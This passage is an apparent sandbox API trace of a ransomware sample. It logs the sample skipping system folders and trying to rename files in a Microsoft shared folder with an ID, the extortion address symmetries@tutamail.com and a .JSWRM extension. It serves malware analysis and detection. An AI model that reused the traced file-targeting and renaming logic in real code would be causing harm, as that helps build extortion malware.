lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.497] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.497] CloseHandle (hObject=0xffffffff) returned 1 [0068.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0068.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0068.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.498] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.498] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9ee, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipsrus.xml", cAlternateFileName="")) returned 1 [0068.498] lstrcmpiW (lpString1="ipsrus.xml", lpString2=".") returned 1 [0068.498] lstrcmpiW (lpString1="ipsrus.xml", lpString2="..") returned 1 [0068.498] lstrcmpiW (lpString1="ipsrus.xml", lpString2="...") returned 1 [0068.498] lstrcmpiW (lpString1="ipsrus.xml", lpString2="windows") returned -1 [0068.498] lstrcmpiW (lpString1="ipsrus.xml", lpString2="recovery") returned -1 [0068.498] lstrcmpiW (lpString1="ipsrus.xml", lpString2="perflogs") returned -1 [0068.498] lstrcmpiW (lpString1="ipsrus.xml", lpString2="documents and settings") returned 1 [0068.498] lstrcmpiW (lpString1="ipsrus.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.498] lstrcmpiW (lpString1="ipsrus.xml", lpString2="system volume information") returned -1 [0068.498] lstrcmpiW (lpString1="ipsrus.xml", lpString2="msocache") returned -1 [0068.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0068.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsrus.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsrus.xml", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsrus.xml", lpUsedDefaultChar=0x0) returned 10 [0068.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0068.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0068.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsrus.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsrus.xml", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsrus.xml", lpUsedDefaultChar=0x0) returned 10 [0068.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0068.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0068.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0068.499] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.499] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9652234625370928) returned 0 [0068.499] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.499] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.499] CloseHandle (hObject=0xffffffff) returned 1 [0068.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0068.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0068.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0068.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.499] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0068.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0068.500] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa08, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipssrb.xml", cAlternateFileName="")) returned 1 [0068.500] lstrcmpiW (lpString1="ipssrb.xml", lpString2=".") returned 1 [0068.500] lstrcmpiW (lpString1="ipssrb.xml", lpString2="..") returned 1 [0068.500] lstrcmpiW (lpString1="ipssrb.xml", lpString2="...") returned 1 [0068.500] lstrcmpiW (lpString1="ipssrb.xml", lpString2="windows") returned -1 [0068.500] lstrcmpiW (lpString1="ipssrb.xml", lpString2="recovery") returned -1 [0068.500] lstrcmpiW (lpString1="ipssrb.xml", lpString2="perflogs") returned -1 [0068.500] lstrcmpiW (lpString1="ipssrb.xml", lpString2="documents and settings") returned 1 [0068.500] lstrcmpiW (lpString1="ipssrb.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.500] lstrcmpiW (lpString1="ipssrb.xml", lpString2="system volume information") returned -1 [0068.500] lstrcmpiW (lpString1="ipssrb.xml", lpString2="msocache") returned -1 [0068.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0068.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipssrb.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipssrb.xml", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipssrb.xml", lpUsedDefaultChar=0x0) returned 10 [0068.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0068.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0068.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipssrb.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipssrb.xml", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipssrb.xml", lpUsedDefaultChar=0x0) returned 10 [0068.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0068.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.500] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.501] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9658659896445608) returned 0 [0068.501] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.501] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.501] CloseHandle (hObject=0xffffffff) returned 1 [0068.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0068.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0068.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0068.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.501] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0068.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.501] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa24, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipssrl.xml", cAlternateFileName="")) returned 1 [0068.501] lstrcmpiW (lpString1="ipssrl.xml", lpString2=".") returned 1 [0068.501] lstrcmpiW (lpString1="ipssrl.xml", lpString2="..") returned 1 [0068.501] lstrcmpiW (lpString1="ipssrl.xml", lpString2="...") returned 1 [0068.501] lstrcmpiW (lpString1="ipssrl.xml", lpString2="windows") returned -1 [0068.501] lstrcmpiW (lpString1="ipssrl.xml", lpString2="recovery") returned -1 [0068.501] lstrcmpiW (lpString1="ipssrl.xml", lpString2="perflogs") returned -1 [0068.502] lstrcmpiW (lpString1="ipssrl.xml", lpString2="documents and settings") returned 1 [0068.502] lstrcmpiW (lpString1="ipssrl.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.502] lstrcmpiW (lpString1="ipssrl.xml", lpString2="system volume information") returned -1 [0068.502] lstrcmpiW (lpString1="ipssrl.xml", lpString2="msocache") returned -1 [0068.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0068.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipssrl.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipssrl.xml", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipssrl.xml", lpUsedDefaultChar=0x0) returned 10 [0068.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0068.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipssrl.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipssrl.xml", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipssrl.xml", lpUsedDefaultChar=0x0) returned 10 [0068.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0068.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0068.502] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.502] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9659244012000992) returned 0 [0068.502] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.502] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.502] CloseHandle (hObject=0xffffffff) returned 1 [0068.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0068.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0068.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0068.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.503] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0068.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0068.505] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, 